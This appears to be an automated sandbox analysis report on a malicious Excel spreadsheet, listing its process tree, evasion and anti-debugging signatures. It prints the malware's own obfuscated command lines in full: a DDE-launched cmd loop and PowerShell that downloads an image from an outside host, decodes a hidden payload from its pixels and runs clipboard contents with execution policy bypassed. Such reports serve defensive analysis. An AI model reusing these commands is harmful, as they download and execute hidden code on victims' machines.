Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.3.5.,.1.!. .................A..@....A..CE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................3.5. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..UE.\...\......w..A...1.....B..B........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.4.8.,.1.!. .................A..@....A..UE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......9.............................A..@....A.X"F.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.2.0.,.1.!. .................A..@....A.X"F.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......E...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......K...........................E.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................2.0. .=.=. .9.0. ...Q...........................<.......K................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......W....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......c...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......j...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......v.............................A..@....A.X"F.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.4.8.,.1.!. .................A..@....A.X"F.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4.8. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.X"F.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.1.7.,.1.!. .................A..@....A.X"F.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.7. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Parts of this application are using the .NET runtime (Probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\System32\clip.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls, virustotal: Detection: 34%
Spawns processes
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /V:ON/C'set d0=rMc5( ''Fj$hEJOYU2uwf=ip7CGdI-klmngTR,H34/^|B]Lbs'o%AXvy1[V_0{D;+:}*^&x\aPSW6^^9`etK).N&&for %x in (12,2,11,14,5,5,5,75,75,75,67,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,12,1,48,37,48,28,35,48,37,48,72,12,35,29,48,81,5,5,4,7,60,55,65,60,17,65,60,59,65,7,5,29,20,48,17,27,26,48,37,48,53,51,48,37,48,0,22,70,46,31,78,64,48,81,5,5,4,5,5,56,35,54,71,12,44,4,7,60,59,65,60,55,65,7,29,8,5,48,1,51,35,48,37,48,38,48,81,5,5,81,62,5,5,82,4,7,60,59,65,60,55,65,60,17,65,7,5,29,20,5,48,47,12,48,37,48,79,29,48,37,48,22,79,12,1,48,81,5,5,4,7,60,55,65,60,59,65,60,17,65,60,40,65,60,39,65,7,29,20,5,48,70,48,37,48,53,70,0,22,48,37,48,43,48,37,48,27,26,83,57,48,37,48,31,12,64,48,81,5,4,5,56,35,54,71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -ba
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EchO ^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15
Source: unknownProcess created: C:\Windows\System32\clip.exe CLip
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte & (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /V:ON/C'set d0=rMc5( ''Fj$hEJOYU2uwf=ip7CGdI-klmngTR,H34/^|B]Lbs'o%AXvy1[V_0{D;+:}*^&x\aPSW6^^9`etK).N&&for %x in (12,2,11,14,5,5,5,75,75,75,67,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,12,1,48,37,48,28,35,48,37,48,72,12,35,29,48,81,5,5,4,7,60,55,65,60,17,65,60,59,65,7,5,29,20,48,17,27,26,48,37,48,53,51,48,37,48,0,22,70,46,31,78,64,48,81,5,5,4,5,5,56,35,54,71,12,44,4,7,60,59,65,60,55,65,7,29,8,5,48,1,51,35,48,37,48,38,48,81,5,5,81,62,5,5,82,4,7,60,59,65,60,55,65,60,17,65,7,5,29,20,5,48,47,12,48,37,48,79,29,48,37,48,22,79,12,1,48,81,5,5,4,7,60,55,65,60,59,65,60,17,65,60,40,65,60,39,65,7,29,20,5,48,70,48,37,48,53,70,0,22,48,37,48,43,48,37,48,27,26,83,57,48,37,48,31,12,64,48,81,5,4,5,56,35,54,71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -baJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EchO ^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\clip.exe CLip
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte & (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
Found graphical window changes (likely an installer)
Source: Window Recorder, Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000008.00000002.1587987947.01A30000.00000002.sdmp
Document has a 'lastprinted' value indicative of goodware
Source: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls, Initial sample: OLE summary lastprinted = 2018-10-05 03:08:22

Data Obfuscation:

Obfuscated command line found
PowerShell case anomaly found

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\clip.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492 Thread sleep time: -922337203685477s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe System information queried: KernelDebuggerInformation
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -ba
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EchO ^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\clip.exe CLip
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte & (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /V:ON/C'set d0=rMc5( ''Fj$hEJOYU2uwf=ip7CGdI-klmngTR,H34/^|B]Lbs'o%AXvy1[V_0{D;+:}*^&x\aPSW6^^9`etK).N&&for %x in (12,2,11,14,5,5,5,75,75,75,67,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,12,1,48,37,48,28,35,48,37,48,72,12,35,29,48,81,5,5,4,7,60,55,65,60,17,65,60,59,65,7,5,29,20,48,17,27,26,48,37,48,53,51,48,37,48,0,22,70,46,31,78,64,48,81,5,5,4,5,5,56,35,54,71,12,44,4,7,60,59,65,60,55,65,7,29,8,5,48,1,51,35,48,37,48,38,48,81,5,5,81,62,5,5,82,4,7,60,59,65,60,55,65,60,17,65,7,5,29,20,5,48,47,12,48,37,48,79,29,48,37,48,22,79,12,1,48,81,5,5,4,7,60,55,65,60,59,65,60,17,65,60,40,65,60,39,65,7,29,20,5,48,70,48,37,48,53,70,0,22,48,37,48,43,48,37,48,27,26,83,57,48,37,48,31,12,64,48,81,5,4,5,56,35,54,71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,
